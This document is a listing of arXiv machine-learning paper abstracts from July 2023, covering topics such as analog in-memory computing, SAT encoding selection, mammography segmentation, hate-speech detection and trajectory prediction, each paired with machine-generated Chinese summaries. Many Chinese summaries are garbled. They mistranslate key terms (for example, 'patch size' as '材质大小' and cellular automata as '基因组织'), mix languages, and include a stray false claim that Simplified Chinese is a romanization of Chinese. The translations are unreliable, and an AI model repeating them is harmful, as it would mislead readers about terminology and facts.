Analog In-Memory Computing (AIMC) is a promising approach to reduce the latency and energy consumption of Deep Neural Network (DNN) inference and training. However, the noisy and non-linear device characteristics, and the non-ideal peripheral circuitry in AIMC chips, require adapting DNNs to be deployed on such hardware to achieve equivalent accuracy to digital computing. In this tutorial, we provide a deep dive into how such adaptations can be achieved and evaluated using the recently released IBM Analog Hardware Acceleration Kit (AIHWKit), freely available at https://github.com/IBM/aihwkit. The AIHWKit is a Python library that simulates inference and training of DNNs using AIMC. We present an in-depth description of the AIHWKit design, functionality, and best practices to properly perform inference and training. We also present an overview of the Analog AI Cloud Composer, that provides the benefits of using the AIHWKit simulation platform in a fully managed cloud setting. Finally, we show examples on how users can expand and customize AIHWKit for their own needs. This tutorial is accompanied by comprehensive Jupyter Notebook code examples that can be run using AIHWKit, which can be downloaded from https://github.com/IBM/aihwkit/tree/master/notebooks/tutorial.

摘要
智能存储计算（AIMC）是一种有前途的方法，以减少深度神经网络（DNN）的延迟和能耗。然而，设备特性和周围电路在AIMC芯片上是不准确的，需要适应DNN来实现相同的准确率。在这个教程中，我们将提供深入的解释如何实现和评估这些适应，以及使用IBM的分析硬件加速器包（AIHWKit）进行 simulate inference和训练。AIHWKit是一个基于Python的库，可以模拟DNN的推理和训练 using AIMC。我们将提供AIHWKit的设计、功能和最佳实践，以及使用Analog AI Cloud Composer在云环境中实现相应的优势。最后，我们将展示用户如何扩展和自定义AIHWKit。这个教程的详细 Jupyter Notebook 代码示例可以从https://github.com/IBM/aihwkit/tree/master/notebooks/tutorial下载。

Learning to Select SAT Encodings for Pseudo-Boolean and Linear Integer Constraints

paper_url: http://arxiv.org/abs/2307.09342
repo_url: https://github.com/felixvuo/lease-data
paper_authors: Felix Ulrich-Oltean, Peter Nightingale, James Alfred Walker
for: 解决复杂的满足和优化问题
methods: 使用超级vised机器学习方法选择编码
results: 比AutoFolio好，可以选择不同类型的问题编码

Abstract
Many constraint satisfaction and optimisation problems can be solved effectively by encoding them as instances of the Boolean Satisfiability problem (SAT). However, even the simplest types of constraints have many encodings in the literature with widely varying performance, and the problem of selecting suitable encodings for a given problem instance is not trivial. We explore the problem of selecting encodings for pseudo-Boolean and linear constraints using a supervised machine learning approach. We show that it is possible to select encodings effectively using a standard set of features for constraint problems; however we obtain better performance with a new set of features specifically designed for the pseudo-Boolean and linear constraints. In fact, we achieve good results when selecting encodings for unseen problem classes. Our results compare favourably to AutoFolio when using the same feature set. We discuss the relative importance of instance features to the task of selecting the best encodings, and compare several variations of the machine learning method.

摘要
许多约束满足和优化问题可以有效地通过编码为布尔满足问题（SAT）解决。然而，最简单的约束类型还有许多编码方法在文献中，这些编码方法之间的性能差异很大，选择适合的编码方法 для给定问题实例是一个不容易的问题。我们使用监督式机器学习方法来选择编码方法，并证明可以使用标准的约束问题特征集来选择编码方法，但是使用专门为 Pseudo-Boolean 和线性约束设计的新特征集可以获得更好的性能。我们在使用同一集特征时与 AutoFolio 进行比较，并讨论实例特征对选择最佳编码方法的重要性。我们还比较了几种机器学习方法的变种。

Towards Automated Semantic Segmentation in Mammography Images

paper_url: http://arxiv.org/abs/2307.10296
repo_url: None
paper_authors: Cesar A. Sierra-Franco, Jan Hurtado, Victor de A. Thomaz, Leonardo C. da Cruz, Santiago V. Silva, Alberto B. Raposo
for: 检测非可触护乳腺癌，提供诊断和评估图像质量的机会。
methods: 使用深度学习框架自动 segmenting 乳腺、肌肉、肉细胞和脂肪组织的边界。
results: 在多种不同的框架和图像 dataset 下，实现了准确的 segmentation 性能，表明该框架可以在临床实践中整合。

Abstract
Mammography images are widely used to detect non-palpable breast lesions or nodules, preventing cancer and providing the opportunity to plan interventions when necessary. The identification of some structures of interest is essential to make a diagnosis and evaluate image adequacy. Thus, computer-aided detection systems can be helpful in assisting medical interpretation by automatically segmenting these landmark structures. In this paper, we propose a deep learning-based framework for the segmentation of the nipple, the pectoral muscle, the fibroglandular tissue, and the fatty tissue on standard-view mammography images. We introduce a large private segmentation dataset and extensive experiments considering different deep-learning model architectures. Our experiments demonstrate accurate segmentation performance on variate and challenging cases, showing that this framework can be integrated into clinical practice.

摘要
乳影像广泛用于检测不可触感乳腺癌病或肿块，预防癌病并提供诊断和治疗计划时的机会。确定一些关键结构的标识是诊断和评估影像质量的关键。因此，计算机助成检测系统可以帮助医疗解释人员自动分割关键结构。在这篇论文中，我们提出了基于深度学习的框架，用于标识乳膜、肌肉、肉絮组织和脂肪组织在标准视图乳影像中的自动分割。我们提供了大量私有分割数据集和广泛的实验，考虑了不同的深度学习模型架构。我们的实验结果表明，这种框架在多种和复杂的案例中具有高准确性，这表明该框架可以在临床实践中集成。

Exploiting Field Dependencies for Learning on Categorical Data

paper_url: http://arxiv.org/abs/2307.09321
repo_url: https://github.com/csiro-robotics/mdl
paper_authors: Zhibin Li, Piotr Koniusz, Lu Zhang, Daniel Edward Pagendam, Peyman Moghadam
for: 学习 categorical 数据中的依赖关系，以提高模型的准确率和稳定性。
methods: 提出了一种新的方法，通过学习全局字段依赖矩阵，然后在实例级别使用不同的权重（即本地依赖模型）来提高字段间的模型。
results: 在六个popular数据集上比较了多种现有方法，并达到了更高的准确率和稳定性。详细的ablation study提供了更多的内容。

Abstract
Traditional approaches for learning on categorical data underexploit the dependencies between columns (\aka fields) in a dataset because they rely on the embedding of data points driven alone by the classification/regression loss. In contrast, we propose a novel method for learning on categorical data with the goal of exploiting dependencies between fields. Instead of modelling statistics of features globally (i.e., by the covariance matrix of features), we learn a global field dependency matrix that captures dependencies between fields and then we refine the global field dependency matrix at the instance-wise level with different weights (so-called local dependency modelling) w.r.t. each field to improve the modelling of the field dependencies. Our algorithm exploits the meta-learning paradigm, i.e., the dependency matrices are refined in the inner loop of the meta-learning algorithm without the use of labels, whereas the outer loop intertwines the updates of the embedding matrix (the matrix performing projection) and global dependency matrix in a supervised fashion (with the use of labels). Our method is simple yet it outperforms several state-of-the-art methods on six popular dataset benchmarks. Detailed ablation studies provide additional insights into our method.

摘要
传统方法学习 categorical 数据会忽略数据集中列（即字段）之间的依赖关系，因为它们基于单独的分类/回归损失来驱动数据点的嵌入。相比之下，我们提出了一种新的方法，旨在利用数据集中列之间的依赖关系。而不是通过特征的全局统计来模型特征（即特征的covariance矩阵），我们学习一个全局字段依赖矩阵，然后在每个实例级别使用不同的权重（即本地依赖模型）来改进字段依赖的模型。我们的算法利用了元学习 парадиг，即依赖矩阵在内Loop中被反复更新，而外Loop则在有标签的情况下，将插入矩阵的更新和全局依赖矩阵的更新相互交互。我们的方法简单，但它在六个流行的数据集benchmark上表现出色，并且我们进行了详细的拟合分析，以提供更多的准确性。

Biomaker CA: a Biome Maker project using Cellular Automata

paper_url: http://arxiv.org/abs/2307.09320
repo_url: None
paper_authors: Ettore Randazzo, Alexander Mordvintsev
for: 这个论文是关于使用细胞自动机（CA）模拟生物体的生长和进化的研究。
methods: 这个研究使用了Python JAX框架对2D网格上的CA规则进行并行计算，并提供了不同的环境和物理法则，以及不同的模型架构和 мутаagen策略。
results: 研究人员通过模拟不同的环境和物理法则，证明了植物代理可以在缺乏营养的环境中生长、存活、繁殖和演化，并且可以通过用户交互式进行进化。

Abstract
We introduce Biomaker CA: a Biome Maker project using Cellular Automata (CA). In Biomaker CA, morphogenesis is a first class citizen and small seeds need to grow into plant-like organisms to survive in a nutrient starved environment and eventually reproduce with variation so that a biome survives for long timelines. We simulate complex biomes by means of CA rules in 2D grids and parallelize all of its computation on GPUs through the Python JAX framework. We show how this project allows for several different kinds of environments and laws of 'physics', alongside different model architectures and mutation strategies. We further analyze some configurations to show how plant agents can grow, survive, reproduce, and evolve, forming stable and unstable biomes. We then demonstrate how one can meta-evolve models to survive in a harsh environment either through end-to-end meta-evolution or by a more surgical and efficient approach, called Petri dish meta-evolution. Finally, we show how to perform interactive evolution, where the user decides how to evolve a plant model interactively and then deploys it in a larger environment. We open source Biomaker CA at: https://tinyurl.com/2x8yu34s .

摘要
我们介绍生物创造器 CA：一个基因组织（CA）的生物创造项目。在生物创造器 CA 中，形态形成是一等公民，小种子需要在营养不足的环境中增长成植物如果生存，并最终繁殖，具有多样性，以确保生物群落长期存活。我们使用2D网格上的 CA 规则来模拟复杂的生态系统，并通过 Python JAX 框架在 GPU 上分布式计算。我们显示了这个项目可以支援多种环境和物理法则，以及不同的模型架构和突变策略。我们进一步分析了一些配置，说明植物代表如何在营养不足的环境中增长、存活、繁殖和演化，形成稳定和不稳定的生态系统。我们还示出了如何使用终端进化来在严峻环境中存活，或者使用更精确和高效的方法，即 Petri dish 进化。最后，我们显示了如何进行互动演化，让用户可以在互动式的方式下演化植物模型，然后将其部署到更大的环境中。我们开源了生物创造器 CA，请参考以下连结：https://tinyurl.com/2x8yu34s。

paper_url: http://arxiv.org/abs/2307.09312
repo_url: https://github.com/liamhebert/multimodaldiscussiontransformer
paper_authors: Liam Hebert, Gaurav Sahu, Nanda Kishore Sreenivas, Lukasz Golab, Robin Cohen
for: 本研究的目的是开发一种基于多模态图表示的 hate speech 检测模型，以捕捉在在线社交网络中的谩骂语言。
methods: 该模型使用图transformer来捕捉整个讨论的上下文关系，并使用杂合层将文本和图像嵌入组合以取代单modal处理。
results: 对于基elines进行比较，我们发现我们的模型在检测 hate speech 方面的性能明显提高了，并进行了广泛的ablation研究。Translation:
for: The purpose of this study is to develop a hate speech detection model based on multimodal graph representation, to capture anti-social behavior in online social networks.
methods: The model uses graph transformers to capture the contextual relationships in the entire discussion, and combines text and image embeddings using fusion layers instead of processing them separately.
results: Compared to baselines, our model shows significantly improved performance in detecting hate speech, and we conducted extensive ablation studies.

Abstract
We present the Multi-Modal Discussion Transformer (mDT), a novel multi-modal graph-based transformer model for detecting hate speech in online social networks. In contrast to traditional text-only methods, our approach to labelling a comment as hate speech centers around the holistic analysis of text and images. This is done by leveraging graph transformers to capture the contextual relationships in the entire discussion that surrounds a comment, with interwoven fusion layers to combine text and image embeddings instead of processing different modalities separately. We compare the performance of our model to baselines that only process text; we also conduct extensive ablation studies. We conclude with future work for multimodal solutions to deliver social value in online contexts, arguing that capturing a holistic view of a conversation greatly advances the effort to detect anti-social behavior.

摘要
我们介绍了多模态讨论变换器（mDT），一种新的多模态图基于变换器模型，用于在社交网络上探测 hate speech。与传统的文本Only方法不同，我们的方法是根据对评论的全面分析，包括文本和图像。我们利用图transformer来捕捉讨论中的上下文关系，并通过交叠卷积层将文本和图像嵌入拼接在一起，而不是分开处理不同的模式。我们与基线对比，并进行了广泛的剖析研究。我们 conclude 未来的多模态解决方案可以为在线上提供社会价值，因为捕捉讨论的全面视图可以帮助探测反社会行为。

Automatic Differentiation for Inverse Problems with Applications in Quantum Transport

paper_url: http://arxiv.org/abs/2307.09311
repo_url: None
paper_authors: Ivan Williams, Eric Polizzi
for: inverse quantum transport problem
methods: neural solver and differentiable simulation
results: engineering continuous transmission properties and current-voltage characteristics

Abstract
A neural solver and differentiable simulation of the quantum transmitting boundary model is presented for the inverse quantum transport problem. The neural solver is used to engineer continuous transmission properties and the differentiable simulation is used to engineer current-voltage characteristics.

摘要
neural 算法和可导的量子传输边界模型是用于反向量 calculus 问题的解决方案。 neural 算法用于引入连续传输性质，而可导的 simulate 用于引入电流-电压特性。

paper_url: http://arxiv.org/abs/2307.09306
repo_url: https://github.com/inhwanbae/eigentrajectory
paper_authors: Inhwan Bae, Jean Oh, Hae-Gon Jeon
For: 本研究旨在提高人行道预测的精度和可靠性，通过使用新的轨迹描述符来减少轨迹的维度。* Methods: 我们使用一种新的轨迹描述符，将人行道径变换为一个紧凑的 $\mathbb{ET}$ 空间，然后使用现有的轨迹预测模型进行预测。此外，我们还提出了一种基于轨迹锚点的修正方法，以覆盖所有可能的未来。* Results: 我们的实验结果表明，使用我们的 EigenTrajectory 预测器可以显著提高现有轨迹预测模型的预测精度和可靠性，这表明我们的描述符适用于表示行人行为。代码可以在 https://github.com/inhwanbae/EigenTrajectory 上下载。

Abstract
Capturing high-dimensional social interactions and feasible futures is essential for predicting trajectories. To address this complex nature, several attempts have been devoted to reducing the dimensionality of the output variables via parametric curve fitting such as the B\'ezier curve and B-spline function. However, these functions, which originate in computer graphics fields, are not suitable to account for socially acceptable human dynamics. In this paper, we present EigenTrajectory ($\mathbb{ET}$), a trajectory prediction approach that uses a novel trajectory descriptor to form a compact space, known here as $\mathbb{ET}$ space, in place of Euclidean space, for representing pedestrian movements. We first reduce the complexity of the trajectory descriptor via a low-rank approximation. We transform the pedestrians' history paths into our $\mathbb{ET}$ space represented by spatio-temporal principle components, and feed them into off-the-shelf trajectory forecasting models. The inputs and outputs of the models as well as social interactions are all gathered and aggregated in the corresponding $\mathbb{ET}$ space. Lastly, we propose a trajectory anchor-based refinement method to cover all possible futures in the proposed $\mathbb{ET}$ space. Extensive experiments demonstrate that our EigenTrajectory predictor can significantly improve both the prediction accuracy and reliability of existing trajectory forecasting models on public benchmarks, indicating that the proposed descriptor is suited to represent pedestrian behaviors. Code is publicly available at https://github.com/inhwanbae/EigenTrajectory .

摘要
Capturing high-dimensional social interactions and feasible futures is essential for predicting trajectories. To address this complex nature, several attempts have been devoted to reducing the dimensionality of the output variables via parametric curve fitting such as the B\'ezier curve and B-spline function. However, these functions, which originate in computer graphics fields, are not suitable to account for socially acceptable human dynamics. In this paper, we present EigenTrajectory ($\mathbb{ET}$), a trajectory prediction approach that uses a novel trajectory descriptor to form a compact space, known here as $\mathbb{ET}$ space, in place of Euclidean space, for representing pedestrian movements. We first reduce the complexity of the trajectory descriptor via a low-rank approximation. We transform the pedestrians' history paths into our $\mathbb{ET}$ space represented by spatio-temporal principle components, and feed them into off-the-shelf trajectory forecasting models. The inputs and outputs of the models as well as social interactions are all gathered and aggregated in the corresponding $\mathbb{ET}$ space. Lastly, we propose a trajectory anchor-based refinement method to cover all possible futures in the proposed $\mathbb{ET}$ space. Extensive experiments demonstrate that our EigenTrajectory predictor can significantly improve both the prediction accuracy and reliability of existing trajectory forecasting models on public benchmarks, indicating that the proposed descriptor is suited to represent pedestrian behaviors. Code is publicly available at https://github.com/inhwanbae/EigenTrajectory .

Conformal prediction under ambiguous ground truth

paper_url: http://arxiv.org/abs/2307.09302
repo_url: None
paper_authors: David Stutz, Abhijit Guha Roy, Tatiana Matejovicova, Patricia Strachan, Ali Taylan Cemgil, Arnaud Doucet
for: 这个论文的目的是提出一种基于不确定标签的整形预测方法，以便在不具备准确标签的情况下进行不确定性评估。
methods: 该方法基于一种approximentation of the underlying posterior distribution of labels given inputs，以便处理不具备准确标签的情况。
results: 在synthetic和实际 dataset上，该方法可以准确地预测输入样本的标签，并且可以正确地评估输入样本的不确定性。在一个dermatology例子中，该方法可以成功地预测皮肤状况的标签。

Abstract
In safety-critical classification tasks, conformal prediction allows to perform rigorous uncertainty quantification by providing confidence sets including the true class with a user-specified probability. This generally assumes the availability of a held-out calibration set with access to ground truth labels. Unfortunately, in many domains, such labels are difficult to obtain and usually approximated by aggregating expert opinions. In fact, this holds true for almost all datasets, including well-known ones such as CIFAR and ImageNet. Applying conformal prediction using such labels underestimates uncertainty. Indeed, when expert opinions are not resolvable, there is inherent ambiguity present in the labels. That is, we do not have ``crisp'', definitive ground truth labels and this uncertainty should be taken into account during calibration. In this paper, we develop a conformal prediction framework for such ambiguous ground truth settings which relies on an approximation of the underlying posterior distribution of labels given inputs. We demonstrate our methodology on synthetic and real datasets, including a case study of skin condition classification in dermatology.

摘要
在安全关键分类任务中，协形预测可以进行严格的不确定性评估，提供包含真实类别的信任集，用户可以指定概率。通常假设有一个保留 calibration set 可以获得真实标签。然而，在许多领域，这些标签很难获得，通常通过专家意见的汇总来估计。实际上，这是大多数数据集中的情况，包括常见的 CIFAR 和 ImageNet。在这些标签不确定的情况下，使用协形预测会下降 uncertainty。事实上，当专家意见不能分解时，存在 inherent ambiguity 在标签中。即，我们没有 "卷积" 、definitive 的地面实标签，这种uncertainty 应该在 calibration 阶段被考虑。在这篇论文中，我们开发了一种协形预测框架，用于这种 ambiguous 地面实标签设置，基于输入的后期分布。我们在 sintetic 和实际数据集上进行了示例研究，包括皮肤状况分类在皮肤科学中。

FlexiAST: Flexibility is What AST Needs

paper_url: http://arxiv.org/abs/2307.09286
repo_url: https://github.com/JiuFengSC/FlexiAST_INTERSPEECH23
paper_authors: Jiu Feng, Mehmet Hamza Erol, Joon Son Chung, Arda Senocak
for: 提高Audio Spectrogram Transformer（AST）模型在不同补丁大小下的性能。
methods: 提出一种基于随机补丁大小选择和补丁重量resize的训练方法，使标准AST模型在推理阶段能够适应不同补丁大小。
results: 实验表明，FlexiAST模型在不同补丁大小下保持类似的性能，而无需进行architecture变更。

Abstract
The objective of this work is to give patch-size flexibility to Audio Spectrogram Transformers (AST). Recent advancements in ASTs have shown superior performance in various audio-based tasks. However, the performance of standard ASTs degrades drastically when evaluated using different patch sizes from that used during training. As a result, AST models are typically re-trained to accommodate changes in patch sizes. To overcome this limitation, this paper proposes a training procedure to provide flexibility to standard AST models without architectural changes, allowing them to work with various patch sizes at the inference stage - FlexiAST. This proposed training approach simply utilizes random patch size selection and resizing of patch and positional embedding weights. Our experiments show that FlexiAST gives similar performance to standard AST models while maintaining its evaluation ability at various patch sizes on different datasets for audio classification tasks.

摘要
“这个工作的目标是给Audio Spectrogram Transformer（AST）提供材质大小灵活性。现代AST的进步已经在不同的音频任务中展示出色的表现。然而，标准AST的表现会在不同的材质大小下逐渐下降，导致AST模型需要重新训练来适应材质大小的变化。为了解决这个限制，这篇文章提出了一种不需要建构更改的训练方法，可以让标准AST模型在测试阶段运行各种材质大小。这个提案使用随机选择材质大小和重复材质大小的位置嵌入对应。我们的实验表明，FlexiAST可以与标准AST模型的表现相似，并且在不同的材质大小下保持评估能力。”Note that Simplified Chinese is a romanization of Chinese, and the actual Chinese text may be written differently.

End-to-End Neural Network Training for Hyperbox-Based Classification

paper_url: http://arxiv.org/abs/2307.09269
repo_url: https://github.com/mlde-ms/hypernn
paper_authors: Denis Mayr Lima Martins, Christian Lülf, Fabian Gieseke
for: 这篇论文是为了提出一个新的、可微分的核心框架，以便实现高效地对大量数据进行分类。
methods: 这篇论文使用了神经网络，并将核心框架转换为可微分的形式，以便实现更高效的训练。
results: 这篇论文的结果显示，使用这个新的核心框架和训练方法可以获得更好的分类结果，并且训练时间更短。

Abstract
Hyperbox-based classification has been seen as a promising technique in which decisions on the data are represented as a series of orthogonal, multidimensional boxes (i.e., hyperboxes) that are often interpretable and human-readable. However, existing methods are no longer capable of efficiently handling the increasing volume of data many application domains face nowadays. We address this gap by proposing a novel, fully differentiable framework for hyperbox-based classification via neural networks. In contrast to previous work, our hyperbox models can be efficiently trained in an end-to-end fashion, which leads to significantly reduced training times and superior classification results.

摘要
互 box 基本的分类技术已被视为一种有前途的技术，在这种技术中，数据的决策被表示为一系列的正交、多维度的盒子（即互 box），这些盒子通常是可读的和人类可读的。然而，现有的方法不再能够有效地处理现在许多应用领域面临的数据量的增加。我们解决这个问题 by proposing a novel, fully differentiable framework for hyperbox-based classification via neural networks. 在我们的方法中，互 box 模型可以在端到端的方式进行高效地训练，这导致了训练时间的减少和分类结果的提高。

Mobility-Aware Joint User Scheduling and Resource Allocation for Low Latency Federated Learning

paper_url: http://arxiv.org/abs/2307.09263
repo_url: None
paper_authors: Kecheng Fan, Wen Chen, Jun Li, Xiumei Deng, Xuefeng Han, Ming Ding
for: 这个论文的目的是提出一个实用的机器学习方法，以解决在联盟学习（Federated Learning，FL）中用户移动导致训练效能下降的问题。
methods: 这个论文使用了一个实际的用户移动模型，并提出了一个用户排程和资源分配方法，以减少训练延迟时间，并且考虑了对于用户移动的影响。
results: simulations results show that the proposed algorithm achieves better performance than the state-of-the-art baselines, and a certain level of user mobility could improve training performance.

Abstract
As an efficient distributed machine learning approach, Federated learning (FL) can obtain a shared model by iterative local model training at the user side and global model aggregating at the central server side, thereby protecting privacy of users. Mobile users in FL systems typically communicate with base stations (BSs) via wireless channels, where training performance could be degraded due to unreliable access caused by user mobility. However, existing work only investigates a static scenario or random initialization of user locations, which fail to capture mobility in real-world networks. To tackle this issue, we propose a practical model for user mobility in FL across multiple BSs, and develop a user scheduling and resource allocation method to minimize the training delay with constrained communication resources. Specifically, we first formulate an optimization problem with user mobility that jointly considers user selection, BS assignment to users, and bandwidth allocation to minimize the latency in each communication round. This optimization problem turned out to be NP-hard and we proposed a delay-aware greedy search algorithm (DAGSA) to solve it. Simulation results show that the proposed algorithm achieves better performance than the state-of-the-art baselines and a certain level of user mobility could improve training performance.

摘要
为了实现高效的分布式机器学习方法，联邦学习（FL）可以在用户端进行轮循式地本地模型训练和中央服务器端进行全球模型汇总，以保护用户隐私。在FL系统中，移动用户通常通过无线通信通道与基站（BS）进行交互，但是训练性能可能受到用户移动导致的不可预测访问所增加的干扰。现有研究仅考虑静止场景或随机初始化用户位置，未能捕捉实际网络中的移动。为解决这个问题，我们提出了实际的用户移动模型在FL中，并开发了一种用户调度和资源分配方法，以最小化通信资源的培训延迟。具体来说，我们首先将用户移动引入到联邦学习中的优化问题中，并jointly考虑用户选择、用户分配到BS以及带宽分配，以最小化每次通信圈中的延迟。这个优化问题被证明是NP困难的，我们提出了延迟意识搜索算法（DAGSA）解决它。实验结果表明，我们的算法在比较状态前的基elines上表现得更好，并且一定程度的用户移动可以提高训练性能。

Adaptive Topological Feature via Persistent Homology: Filtration Learning for Point Clouds

paper_url: http://arxiv.org/abs/2307.09259
repo_url: None
paper_authors: Naoki Nishikawa, Yuichi Ike, Kenji Yamanishi
for: 提高机器学习点云处理精度，应用于形态识别和材料科学等领域。
methods: 使用神经网络学习自适应滤波，以保证 persistent homology 的同质性。
results: 在多个分类任务中表现出色，证明了我们的框架的可行性。Here’s the full text in Simplified Chinese:
for: 本研究旨在提高机器学习点云处理精度，应用于形态识别和材料科学等领域。
methods: 我们提出了一种基于神经网络的自适应滤波方法，以保证 persistent homology 的同质性。
results: 我们在多个分类任务中进行了实验，结果表明我们的框架在这些任务中表现出色，证明了我们的方法的可行性。

Abstract
Machine learning for point clouds has been attracting much attention, with many applications in various fields, such as shape recognition and material science. To enhance the accuracy of such machine learning methods, it is known to be effective to incorporate global topological features, which are typically extracted by persistent homology. In the calculation of persistent homology for a point cloud, we need to choose a filtration for the point clouds, an increasing sequence of spaces. Because the performance of machine learning methods combined with persistent homology is highly affected by the choice of a filtration, we need to tune it depending on data and tasks. In this paper, we propose a framework that learns a filtration adaptively with the use of neural networks. In order to make the resulting persistent homology isometry-invariant, we develop a neural network architecture with such invariance. Additionally, we theoretically show a finite-dimensional approximation result that justifies our architecture. Experimental results demonstrated the efficacy of our framework in several classification tasks.

摘要
In this paper, we propose a framework that learns a filtration adaptively using neural networks. To ensure the resulting persistent homology isometry-invariant, we develop a neural network architecture with such invariance. Additionally, we provide a finite-dimensional approximation result that justifies our architecture. Experimental results show the effectiveness of our framework in several classification tasks.Here's the translation in Simplified Chinese:机器学习 для点云已经吸引了很多关注，并在各种领域上有广泛的应用，如形状识别和材料科学。为了提高机器学习方法的准确性，通常需要包含全局拓扑特征，通常通过不变 homology 来提取。在计算不变 homology 中，我们需要选择一个筛选器，是一个增长序列的空间。由于选择筛选器的性能会高度影响机器学习方法的性能，因此需要根据数据和任务进行调整。在这篇论文中，我们提出了一种框架，通过使用神经网络来自适应地学习筛选器。为确保结果的不变 homology 尺度 invariants，我们开发了一种具有不变性的神经网络架构。此外，我们也提供了一个数学上的有限维approximation 结果，证明了我们的架构的正确性。实验结果表明，我们的框架在多个分类任务中表现出色。

PAC Neural Prediction Set Learning to Quantify the Uncertainty of Generative Language Models

paper_url: http://arxiv.org/abs/2307.09254
repo_url: None
paper_authors: Sangdon Park, Taesoo Kim
for: 提高模型的可靠性和信任worthiness
methods: 使用神经网络 parameterized prediction set models，实现更精准的uncertainty quantification，并且满足 probably approximately correct (PAC) 保证
results: 在四种语言数据集和六种模型上，比基准方法提高quantified uncertainty的精度$63%$的平均值

Abstract
Uncertainty learning and quantification of models are crucial tasks to enhance the trustworthiness of the models. Importantly, the recent surge of generative language models (GLMs) emphasizes the need for reliable uncertainty quantification due to the concerns on generating hallucinated facts. In this paper, we propose to learn neural prediction set models that comes with the probably approximately correct (PAC) guarantee for quantifying the uncertainty of GLMs. Unlike existing prediction set models, which are parameterized by a scalar value, we propose to parameterize prediction sets via neural networks, which achieves more precise uncertainty quantification but still satisfies the PAC guarantee. We demonstrate the efficacy of our method on four types of language datasets and six types of models by showing that our method improves the quantified uncertainty by $63\%$ on average, compared to a standard baseline method.

摘要
<>对不确定性学习和模型评估是重要任务，以提高模型的可靠性。尤其是最近几年的生成语言模型（GLMs），它们的不确定性评估问题得到了更多的关注，因为它们可能会生成假信息。在这篇论文中，我们提议使用神经网络来学习预测集模型，这些模型具有可靠的不确定性评估保证（PAC），并且可以更 precisely 评估 GLMs 的不确定性。 unlike 现有的预测集模型，我们的模型参数化使用神经网络，这使得我们可以更好地评估 GLMs 的不确定性。我们在四种语言 dataset 和六种模型上进行了实验，并证明我们的方法可以提高评估不确定性的精度，相比标准基准方法，提高了63%的平均值。Note: " Probably approximately correct" (PAC) is a theoretical guarantee that the output of a machine learning model is likely to be close to the true output, with a certain level of confidence. In this context, the PAC guarantee is used to ensure that the uncertainty estimates produced by the model are reliable and accurate.

UniTabE: Pretraining a Unified Tabular Encoder for Heterogeneous Tabular Data

paper_url: http://arxiv.org/abs/2307.09249
repo_url: None
paper_authors: Yazheng Yang, Yuqi Wang, Guang Liu, Ledell Wu, Qi Liu
for: 本研究旨在推广自然语言处理（NLP）中的预训练方法，应用于表格数据，以提高表格数据分析的Semantic Representation。
methods: 本研究使用了UniTabE方法，该方法基于表格元素模块（TabUnit）和Transformer编码器，可以适应不同的表格结构。此外，模型还支持预训练和Finetuning，通过自由形式的提示。
results: 实验结果显示，UniTabE方法在多个benchmark dataset上表现出色，超过了多个基eline模型。这说明UniTabE方法可以有效地提高表格数据的Semantic Representation，为表格数据分析带来 significiant progress.

Abstract
Recent advancements in Natural Language Processing (NLP) have witnessed the groundbreaking impact of pretrained models, yielding impressive outcomes across various tasks. This study seeks to extend the power of pretraining methodologies to tabular data, a domain traditionally overlooked, yet inherently challenging due to the plethora of table schemas intrinsic to different tasks. The primary research questions underpinning this work revolve around the adaptation to heterogeneous table structures, the establishment of a universal pretraining protocol for tabular data, the generalizability and transferability of learned knowledge across tasks, the adaptation to diverse downstream applications, and the incorporation of incremental columns over time. In response to these challenges, we introduce UniTabE, a pioneering method designed to process tables in a uniform manner, devoid of constraints imposed by specific table structures. UniTabE's core concept relies on representing each basic table element with a module, termed TabUnit. This is subsequently followed by a Transformer encoder to refine the representation. Moreover, our model is designed to facilitate pretraining and finetuning through the utilization of free-form prompts. In order to implement the pretraining phase, we curated an expansive tabular dataset comprising approximately 13 billion samples, meticulously gathered from the Kaggle platform. Rigorous experimental testing and analyses were performed under a myriad of scenarios to validate the effectiveness of our methodology. The experimental results demonstrate UniTabE's superior performance against several baseline models across a multitude of benchmark datasets. This, therefore, underscores UniTabE's potential to significantly enhance the semantic representation of tabular data, thereby marking a significant stride in the field of tabular data analysis.

摘要
近年的自然语言处理（NLP）技术发展，启示出革命性的影响，在多种任务上取得了卓越的成绩。这项研究旨在扩展预训练方法的应用范围，推广到表格数据领域，这是传统上受过忽略的领域，但具有各种表格结构的强大挑战。本研究的主要问题包括适应不同表格结构、建立通用预训练协议、学习知识的通用性和跨任务传递性、适应多种下游应用、以及逐渐增加的列的支持。为解决这些挑战，我们提出了UniTabE方法，用于统一处理表格数据，不受特定表格结构的限制。UniTabE的核心思想是将每个基本表格元素表示为Module，称为TabUnit，然后使用Transformer编码器进行细化表示。此外，我们的模型设计能够方便预训练和finetuning，通过使用自由形式的提示。为进行预训练阶段，我们精心收集了约130亿个样本的大量表格数据，从Kaggle平台上精心收集。通过多种情况下的严格实验和分析，我们证明UniTabE方法在多个benchmark数据集上的表现优于多个基eline模型。这一结果 therefore表明UniTabE具有提高表格数据semantic表示的潜在能力，从而为表格数据分析带来重要的进步。

Application of BERT in Wind Power Forecasting-Teletraan’s Solution in Baidu KDD Cup 2022

paper_url: http://arxiv.org/abs/2307.09248
repo_url: https://github.com/longxingtan/kdd2022-baidu
paper_authors: Longxing Tan, Hongying Yue
for: 预测风力电力系统的可靠性和可持续发展
methods: 使用BERT模型和日均异常值补做来预测风力电力系统的输出
results: 在Baidu KDD Cup 2022中获得第三名，代表着模型的可靠性和精度Here’s a more detailed explanation of each point:
for: The paper is written for the purpose of improving the reliability and sustainability of wind power systems by using a BERT model and daily fluctuation post-processing to make accurate predictions.
methods: The paper uses the BERT model, which is a type of deep learning model that has shown great success in natural language processing tasks, to predict the output of wind power systems. Additionally, the authors add daily fluctuation to the predicted results through post-processing to make the predictions more accurate and in line with daily periodicity.
results: The authors achieved third place out of 2490 teams in the Baidu KDD Cup 2022, which demonstrates the effectiveness and accuracy of their proposed method.

Abstract
Nowadays, wind energy has drawn increasing attention as its important role in carbon neutrality and sustainable development. When wind power is integrated into the power grid, precise forecasting is necessary for the sustainability and security of the system. However, the unpredictable nature and long sequence prediction make it especially challenging. In this technical report, we introduce the BERT model applied for Baidu KDD Cup 2022, and the daily fluctuation is added by post-processing to make the predicted results in line with daily periodicity. Our solution achieves 3rd place of 2490 teams. The code is released athttps://github.com/LongxingTan/KDD2022-Baidu

摘要
